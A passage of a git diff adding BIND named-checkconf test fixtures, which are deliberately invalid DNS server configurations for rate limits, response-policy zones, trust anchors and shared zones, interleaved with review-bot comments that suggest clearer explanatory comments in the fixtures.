index 0000000..ecfb5f8
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-nodata-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ nodata-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf
new file mode 100644
index 0000000..77c5749
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-nxdomains-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ nxdomains-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf b/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf
new file mode 100644
index 0000000..0dc4532
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-qps-scale.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ qps-scale 0; // must be greater than zero
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf
new file mode 100644
index 0000000..0ea4836
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-referrals-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ referrals-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf b/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf
new file mode 100644
index 0000000..8187244
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-responses-per-second.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ responses-per-second 1001; // greater than DNS_RRL_MAX_RATE
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-slip.conf b/bin/tests/system/checkconf/bad-rate-limit-slip.conf
new file mode 100644
index 0000000..15d270c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-slip.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ slip 11; // greater than default of 10
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rate-limit-window.conf b/bin/tests/system/checkconf/bad-rate-limit-window.conf
new file mode 100644
index 0000000..7ded786
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rate-limit-window.conf
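Review bot: The trailing comment on `slip 11;` in bad-rate-limit-slip.conf calls 10 the default, but the fixture is rejected because 11 exceeds the upper bound; BIND documents the `slip` default as 2 with a permitted range of 0 to 10. The comment should read `// greater than maximum of 10`, matching how the sibling fixtures cite DNS_RRL_MAX_RATE. bad-rate-limit-window.conf in the next hunk has the same slip: `window 3601; // greater than default of 3600` should say `// greater than maximum of 3600`, since the documented default window is 15 seconds. Getting this right matters because these comments are the only record of which response-rate-limiting bound each test protects.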
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ rate-limit {
+ window 3601; // greater than default of 3600
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-root-mixed-key.conf b/bin/tests/system/checkconf/bad-root-mixed-key.conf
new file mode 100644
index 0000000..7035066
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-root-mixed-key.conf
@@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +trust-anchors { + # This key (19036) is to be phased out starting in 2017. It will + # remain in the root zone for some time after its successor key + # has been added. It will remain this file until it is removed from + # the root zone. + . static-key 257 3 8 "AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF + FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX + bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD + X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz + W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS + Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq + QxA+Uk1ihz0="; + + # This key (20326) was published in the root zone in 2017. + # Servers which were already using the old key (19036) should + # roll seamlessly to this new one via RFC 5011 rollover. Servers + # being set up for the first time can use the contents of this + # file as initializing keys; thereafter, the keys in the + # managed key database will be trusted and maintained + # automatically. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; 
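Review bot: The two comment blocks inside `trust-anchors` in bad-root-mixed-key.conf describe the root KSK rollover rather than why this configuration must be rejected, and the first one reads `It will remain this file` (missing "in"). Judging by the file name and contents, the condition under test appears to be a `static-key` and an `initial-key` both configured for the name `.`. A short header comment such as `# a static-key and an initial-key for the same name must be rejected` would make that explicit. Without it, someone maintaining trust-anchor validation could read the fixture as being about the retirement of key 19036 and drop or alter the entry that makes it fail.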
diff --git a/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf b/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf
new file mode 100644
index 0000000..9861529
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rpz-too-many-zones.conf
@@ -0,0 +1,148 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + response-policy { + zone "max1"; + zone "max2"; + zone "max3"; + zone "max4"; + zone "max5"; + zone "max6"; + zone "max7"; + zone "max8"; + zone "max9"; + zone "max10"; + zone "max11"; + zone "max12"; + zone "max13"; + zone "max14"; + zone "max15"; + zone "max16"; + zone "max17"; + zone "max18"; + zone "max19"; + zone "max20"; + zone "max21"; + zone "max22"; + zone "max23"; + zone "max24"; + zone "max25"; + zone "max26"; + zone "max27"; + zone "max28"; + zone "max29"; + zone "max30"; + zone "max31"; + zone "max32"; + zone "max33"; + zone "max34"; + zone "max35"; + zone "max36"; + zone "max37"; + zone "max38"; + zone "max39"; + zone "max40"; + zone "max41"; + zone "max42"; + zone "max43"; + zone "max44"; + zone "max45"; + zone "max46"; + zone "max47"; + zone "max48"; + zone "max49"; + zone "max50"; + zone "max51"; + zone "max52"; + zone "max53"; + zone "max54"; + zone "max55"; + zone "max56"; + zone "max57"; + zone "max58"; + zone "max59"; + zone "max60"; + zone "max61"; + zone "max62"; + zone "max63"; + zone "max64"; + zone "max65"; + }; +}; + +zone "max1" { type master; file "rpz.db"; }; +zone "max2" { type master; file "rpz.db"; }; +zone "max3" { type master; file "rpz.db"; }; +zone "max4" { type master; file "rpz.db"; }; +zone "max5" { type master; file "rpz.db"; }; +zone "max6" { type master; file "rpz.db"; }; +zone "max7" { type master; file "rpz.db"; }; +zone "max8" { type master; file "rpz.db"; }; +zone "max9" { type master; file "rpz.db"; }; +zone "max10" { type master; file "rpz.db"; }; +zone 
"max11" { type master; file "rpz.db"; }; +zone "max12" { type master; file "rpz.db"; }; +zone "max13" { type master; file "rpz.db"; }; +zone "max14" { type master; file "rpz.db"; }; +zone "max15" { type master; file "rpz.db"; }; +zone "max16" { type master; file "rpz.db"; }; +zone "max17" { type master; file "rpz.db"; }; +zone "max18" { type master; file "rpz.db"; }; +zone "max19" { type master; file "rpz.db"; }; +zone "max20" { type master; file "rpz.db"; }; +zone "max21" { type master; file "rpz.db"; }; +zone "max22" { type master; file "rpz.db"; }; +zone "max23" { type master; file "rpz.db"; }; +zone "max24" { type master; file "rpz.db"; }; +zone "max25" { type master; file "rpz.db"; }; +zone "max26" { type master; file "rpz.db"; }; +zone "max27" { type master; file "rpz.db"; }; +zone "max28" { type master; file "rpz.db"; }; +zone "max29" { type master; file "rpz.db"; }; +zone "max30" { type master; file "rpz.db"; }; +zone "max31" { type master; file "rpz.db"; }; +zone "max32" { type master; file "rpz.db"; }; +zone "max33" { type master; file "rpz.db"; }; +zone "max34" { type master; file "rpz.db"; }; +zone "max35" { type master; file "rpz.db"; }; +zone "max36" { type master; file "rpz.db"; }; +zone "max37" { type master; file "rpz.db"; }; +zone "max38" { type master; file "rpz.db"; }; +zone "max39" { type master; file "rpz.db"; }; +zone "max40" { type master; file "rpz.db"; }; +zone "max41" { type master; file "rpz.db"; }; +zone "max42" { type master; file "rpz.db"; }; +zone "max43" { type master; file "rpz.db"; }; +zone "max44" { type master; file "rpz.db"; }; +zone "max45" { type master; file "rpz.db"; }; +zone "max46" { type master; file "rpz.db"; }; +zone "max47" { type master; file "rpz.db"; }; +zone "max48" { type master; file "rpz.db"; }; +zone "max49" { type master; file "rpz.db"; }; +zone "max50" { type master; file "rpz.db"; }; +zone "max51" { type master; file "rpz.db"; }; +zone "max52" { type master; file "rpz.db"; }; +zone "max53" { type master; 
file "rpz.db"; }; +zone "max54" { type master; file "rpz.db"; }; +zone "max55" { type master; file "rpz.db"; }; +zone "max56" { type master; file "rpz.db"; }; +zone "max57" { type master; file "rpz.db"; }; +zone "max58" { type master; file "rpz.db"; }; +zone "max59" { type master; file "rpz.db"; }; +zone "max60" { type master; file "rpz.db"; }; +zone "max61" { type master; file "rpz.db"; }; +zone "max62" { type master; file "rpz.db"; }; +zone "max63" { type master; file "rpz.db"; }; +zone "max64" { type master; file "rpz.db"; }; +zone "max65" { type master; file "rpz.db"; }; diff --git a/bin/tests/system/checkconf/bad-rpz-ttl.conf b/bin/tests/system/checkconf/bad-rpz-ttl.conf new file mode 100644 index 0000000..d54bba9 --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-ttl.conf @@ -0,0 +1,24 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +zone "example.com." { + type master; + file "example.com.zone"; +}; + +options { + response-policy { + zone "example.com." policy given; + } + max-policy-ttl 1x; +}; diff --git a/bin/tests/system/checkconf/bad-rpz-update.conf b/bin/tests/system/checkconf/bad-rpz-update.conf new file mode 100644 index 0000000..304b46c --- /dev/null +++ b/bin/tests/system/checkconf/bad-rpz-update.conf 
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "example.com." {
+ type master;
+ file "example.com.zone";
+};
+
+options {
+ response-policy {
+ zone "example.com."
+ policy given
+ min-update-interval 5x;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-rpz-zone.conf b/bin/tests/system/checkconf/bad-rpz-zone.conf
new file mode 100644
index 0000000..4aadc61
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-rpz-zone.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ response-policy {
+ zone "nonexistent";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-sharedwritable1.conf b/bin/tests/system/checkconf/bad-sharedwritable1.conf
new file mode 100644
index 0000000..e646b91
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sharedwritable1.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone a {
+ type master;
+ file "shared.db";
+};
+zone b {
+ type slave;
+ file "shared.db";
+ masters { 1.2.3.4; };
+};
diff --git a/bin/tests/system/checkconf/bad-sharedwritable2.conf b/bin/tests/system/checkconf/bad-sharedwritable2.conf
new file mode 100644
index 0000000..2224053
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sharedwritable2.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone a {
+ type slave;
+ file "shared.db";
+ masters { 1.2.3.4; };
+};
+zone b {
+ type slave;
+ file "shared.db";
+ masters { 1.2.3.4; };
+};
diff --git a/bin/tests/system/checkconf/bad-sharedzone1.conf b/bin/tests/system/checkconf/bad-sharedzone1.conf
new file mode 100644
index 0000000..a8255ad
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sharedzone1.conf
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "first" {
+ match-clients {
+ "none";
+ };
+ zone "clone" {
+ type master;
+ file "xxx";
+ };
+};
+view "second" {
+ match-clients {
+ "any";
+ };
+ zone "clone" {
+ in-view "first";
+ type slave;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-sharedzone2.conf b/bin/tests/system/checkconf/bad-sharedzone2.conf
new file mode 100644
index 0000000..fbe601a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sharedzone2.conf
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view "first" {
+ match-clients {
+ "none";
+ };
+ zone "clone" {
+ type master;
+ file "xxx";
+ };
+};
+view "second" {
+ match-clients {
+ "any";
+ };
+ zone "clone" {
+ in-view "first";
+ forward only;
+ forwarders { 10.0.0.100; };
+ type slave;
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-sharedzone3.conf b/bin/tests/system/checkconf/bad-sharedzone3.conf
new file mode 100644
index 0000000..2adc554
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sharedzone3.conf
@@ -0,0 +1,25 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view first {
+ zone shared.example {
+ in-view second;
+ };
+};
+
+view second {
+ zone shared.example {
+ type master;
+ file "shared.example.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-sig-validity.conf b/bin/tests/system/checkconf/bad-sig-validity.conf
new file mode 100644
index 0000000..1744eba
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-sig-validity.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ sig-validity-interval 5000;
+};
diff --git a/bin/tests/system/checkconf/bad-static-initial-1.conf b/bin/tests/system/checkconf/bad-static-initial-1.conf
new file mode 100644
index 0000000..91a5c10
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-static-initial-1.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3";
+ example. static-ds 60724 5 2 "29E79B9064EE1A11DF3BFF19581DDFED7952C22CC204ACE17B6007EB1437E9E6";
+};
diff --git a/bin/tests/system/checkconf/bad-static-initial-2.conf b/bin/tests/system/checkconf/bad-static-initial-2.conf
new file mode 100644
index 0000000..3b4754d
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-static-initial-2.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. initial-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3";
+ example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-static-initial-3.conf b/bin/tests/system/checkconf/bad-static-initial-3.conf
new file mode 100644
index 0000000..c396d9c
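Review bot: Nothing in bad-static-initial-1.conf says that the defect under test is the mix of an `initial-ds` and a `static-ds` anchor for the same name `example.`; each line looks well-formed on its own, so the intent has to be guessed from the file name. A header comment such as `/* static and initial anchors must not be mixed for one name */` would pin it down, assuming that is indeed the rejection named-checkconf is expected to produce. The same applies to bad-static-initial-2.conf, -3.conf and -4.conf, which appear to cover the other ds/key pairings. Stating it matters because an initial anchor only bootstraps the managed-key database while a static one is never updated, and the fixture should make clear which combination is being refused.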
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-static-initial-3.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. static-ds 60724 5 1 "D74CF845955A0DFE604AF215E948E67D2EA94FF3";
+ example. initial-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-static-initial-4.conf b/bin/tests/system/checkconf/bad-static-initial-4.conf
new file mode 100644
index 0000000..2170d52
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-static-initial-4.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+trust-anchors {
+ example. initial-key 257 3 5 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafGtURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJYkYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJfpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaSWG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjINQyrszHhWUU=";
+ example. static-key 257 3 5 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbody0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQYfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuwE60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-stub-masters-dialup.conf b/bin/tests/system/checkconf/bad-stub-masters-dialup.conf
new file mode 100644
index 0000000..9944e82
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-stub-masters-dialup.conf
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port 5300;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ heartbeat-interval 2;
+ recursion no;
+};
+zone "." {
+ type hint;
+ file "hint";
+};
+zone "example." {
+ type stub;
+ dialup notify;
+ notify no;
+ file "example.bk";
+ // masters { 10.53.0.1; };
+};
diff --git a/bin/tests/system/checkconf/bad-transfer-source-v6.conf b/bin/tests/system/checkconf/bad-transfer-source-v6.conf
new file mode 100644
index 0000000..da182ff
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-transfer-source-v6.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
+ primaries { 1.2.3.4; };
+ transfer-source-v6 fd92:7065:b8e:ffff::1 port 5300;
+};
diff --git a/bin/tests/system/checkconf/bad-transfer-source.conf b/bin/tests/system/checkconf/bad-transfer-source.conf
new file mode 100644
index 0000000..315c410
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-transfer-source.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port 5300;
+};
+
+zone example {
+ type secondary;
